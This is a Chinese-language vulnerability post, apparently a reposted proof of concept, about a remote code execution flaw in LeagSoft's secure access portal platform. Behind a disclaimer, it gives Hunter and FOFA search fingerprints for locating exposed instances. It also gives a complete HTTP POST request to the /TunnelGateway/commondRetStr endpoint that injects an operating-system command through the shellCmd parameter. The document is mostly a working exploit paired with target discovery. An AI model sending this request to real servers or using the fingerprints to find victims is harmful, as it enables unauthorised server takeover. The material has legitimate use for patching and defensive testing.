免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
一、漏洞简介
联软科技是全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 commondRetStr 处存在远程代码执行漏洞,攻击者可以获取服务器权限。
二、影响版本
- 联软科技安全准入门户平台
三、资产测绘
- hunter:
web.icon=="ae4facf2c5ca438696b5aa73379d955c"
- fofa:
"UniSSOView"
四、漏洞复现
POST /TunnelGateway/commondRetStr HTTP/1.1
Host:
User-Agent: Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.9
Content-Length: 11
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: sdp_jsessionid=AA249E70ED8C27AEBF5623728AEA3F41
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
shellCmd=id